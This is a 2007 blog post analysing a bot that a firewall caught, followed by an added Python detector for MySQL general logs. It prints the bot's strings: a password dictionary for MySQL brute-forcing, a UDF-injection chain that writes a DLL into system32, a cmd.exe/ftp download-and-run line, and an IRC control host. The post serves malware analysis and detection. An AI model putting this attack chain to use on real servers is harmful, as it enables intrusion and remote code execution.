Skonk-[ModBot]-Small-V0.4

Jun 08, 2007 05:16

Today, completely by accident, I caught a virus in the file soundvol32.exe,
and it was the firewall that caught it, when soundvol32.exe tried to get out onto the Internet.
Not a single antivirus (clamwin, avg, norton-ss, kaspersky) recognises it!

But I managed to pull some strings out of the memory of the running virus:

---
[skip]
Skonk-[ModBot]-Small-V0.4
soundvol32.exe
Please, send the following codes to info@oreans.com. Thank you.
3Cannot write oreans.vxd
oreans32.sys
oreansx64.sys
oreans32
\\.\oreans32
\\.\Global\oreans32
oreansx64
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
administrator's permits the first time that you are going to run this program.

CHECK
Admin
123qwe
123asd
123abc
1234qwer
mine
letmein
company
name
dba
wwwadmin
owner
computer
NO_HOST
Cracked MYSQL - IP: [%s]->[%s] [USER]: %s [PASS]: %s

mysql
mailserver
Found MYSQL - IP:[%s]->[%s] PASS:[NULL]
Found MYSQL - IP:[%s]->[%s] USER:[%s] PASS:[%s]
SELECT do_system("cmd.exe /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s");
CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll';
SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll';
SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll';
INSERT INTO clown (line) VALUES(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000
000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F646
52E0D0D0A2400000000000000504500004C0108009804B3410022000030010000E00006200B010238000800000010000000020000001000000010000
000200000000084680010000000020000040000000100000004000000000000000090000000040000322501000300000000002000001000000000100
000100000000000001000000000400000490000000050000068010000000000000000000000000000000000000000000000000000006000009400000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000002E74657874000000940600000010000000080000000400000000000000000000000000006000006
02E64617461000000300000000020000000020000000C0000000000000000000000000000400000C02E6273730000000090000000003000000000000
000000000000000000000000000000000800000
CREATE TABLE clown (line BLOB);
DROP TABLE IF EXISTS clown;
[skip]
---

What I especially like:

---
Please, contact support@oreans.com. Thank you!
-=|MAIN|=- Bot started
[06-08-2007 04:27:18] -=|MAIN|=- Bot started
irc.buztest.com
---

And here is the official info about it: http://www.bleepingcomputer.com/startups/soundvol32.exe-18219.html
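The SQL strings in the dump, read bottom-up, are the standard MySQL UDF code-execution chain: drop and recreate a table with a single BLOB column, INSERT a hex-encoded PE image (the 0x4D5A "MZ" header), SELECT it INTO DUMPFILE as a .dll under system32 on whatever drive letter works, register it with CREATE FUNCTION ... SONAME, and call the new function with a cmd.exe/ftp download line. As an added example (not part of the original post and not the bot's own code), the Python below scans MySQL general-log style query records and reports any connection that walks that chain. The log records, thread ids and the IP in them are constructed for the example; the stage regexes, the field names and the `min_stages` threshold are my own assumptions.

```python
"""Flag the MySQL UDF code-execution chain seen in the Skonk/ModBot strings
by scanning general-log style query records.

Added example, not from the original post.  SAMPLE_LOG is constructed; the
statements it carries mirror the strings in the memory dump.
"""
import re
from collections import defaultdict

# The dump lists the statements in reverse; the bot runs them in this order:
# DROP TABLE -> CREATE TABLE (BLOB) -> INSERT hex PE -> INTO DUMPFILE into a
# system directory (several drive letters tried) -> CREATE FUNCTION ... SONAME
# -> SELECT do_system("cmd.exe ...").  One regex per stage worth alerting on.
STAGES = [
    ("staging_table", re.compile(r"\bCREATE TABLE\s+(\w+)\s*\(\s*\w+\s+BLOB\s*\)", re.I)),
    # 0x4D5A is "MZ", the DOS header magic of a PE file pushed in as a hex literal
    ("pe_insert",     re.compile(r"\bINSERT INTO\s+(\w+)\s*\([^)]*\)\s*VALUES\s*\(\s*0x4D5A", re.I)),
    ("dll_dump",      re.compile(r"\bINTO DUMPFILE\s+'([^']+\.dll)'", re.I)),
    ("udf_register",  re.compile(r"\bCREATE FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)),
    ("udf_exec",      re.compile(r"\bSELECT\s+(\w+)\s*\(\s*[\"'][^\"']*\bcmd\.exe\b", re.I)),
]

# Classic general-log record: "YYMMDD HH:MM:SS <thread id> Query <statement>".
# Multi-line statements continue on unprefixed lines; those are ignored here.
LOG_RECORD = re.compile(r"^(\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+(\d+)\s+Query\s+(.*)$")

# Constructed sample: thread 3 is a normal application session (it even
# creates a BLOB table), thread 7 is the bot working through the chain.
SAMPLE_LOG = """\
070608 04:27:10\t    3 Connect\tapp@10.0.0.5 on shop
070608 04:27:10\t    3 Query\tSELECT id, name FROM products WHERE id = 17
070608 04:27:11\t    3 Query\tCREATE TABLE import_tmp (line BLOB)
070608 04:27:18\t    7 Connect\troot@192.168.1.44 on
070608 04:27:18\t    7 Query\tDROP TABLE IF EXISTS clown
070608 04:27:18\t    7 Query\tCREATE TABLE clown (line BLOB)
070608 04:27:19\t    7 Query\tINSERT INTO clown (line) VALUES(0x4D5A90000300000004000000FFFF0000)
070608 04:27:19\t    7 Query\tSELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070608 04:27:19\t    7 Query\tSELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070608 04:27:19\t    7 Query\tSELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070608 04:27:20\t    7 Query\tCREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070608 04:27:20\t    7 Query\tSELECT do_system("cmd.exe /c echo open 1.2.3.4 21 > o&echo user 1 1 >> o &ftp -n -s:o")
070608 04:27:21\t    3 Query\tSELECT COUNT(*) FROM orders
"""


def parse_general_log(text):
    """Yield (timestamp, thread_id, statement) for each Query record."""
    for line in text.splitlines():
        m = LOG_RECORD.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(3)


def detect_udf_chain(text, min_stages=3):
    """Group query records by thread id and report threads that register a
    UDF with SONAME (suspicious on its own) or hit at least `min_stages` of
    the chain.  Returns a list of finding dicts sorted by thread id."""
    seen = defaultdict(dict)          # thread -> stage name -> (ts, captured name)
    dump_attempts = defaultdict(int)  # thread -> number of INTO DUMPFILE tries
    for ts, thread, stmt in parse_general_log(text):
        for stage, rx in STAGES:
            m = rx.search(stmt)
            if not m:
                continue
            if stage == "dll_dump":
                dump_attempts[thread] += 1
            seen[thread].setdefault(stage, (ts, m.group(1)))
    findings = []
    for thread in sorted(seen):
        stages = [s for s, _ in STAGES if s in seen[thread]]
        if "udf_register" not in stages and len(stages) < min_stages:
            continue
        findings.append({
            "thread": thread,
            "first_seen": seen[thread][stages[0]][0],
            "stages": stages,
            "dump_attempts": dump_attempts[thread],
            "udf_name": seen[thread].get("udf_register", (None, None))[1],
            "severity": "critical" if "udf_exec" in stages else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_udf_chain(SAMPLE_LOG):
        print(finding)
```

CREATE FUNCTION ... SONAME is worth an alert by itself: a legitimate deployment registers UDFs once, by an administrator, not from an application account in the middle of a session. Functions already registered on a server can be listed with `SELECT * FROM mysql.func`, and writing arbitrary files with INTO DUMPFILE is exactly what the `secure_file_priv` setting exists to restrict. The chain also needs a MySQL account that authenticates with one of the passwords in the dump's list (or none at all) and a server process allowed to write into system32, both of which are worth checking before the log is.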

tech, virus, links
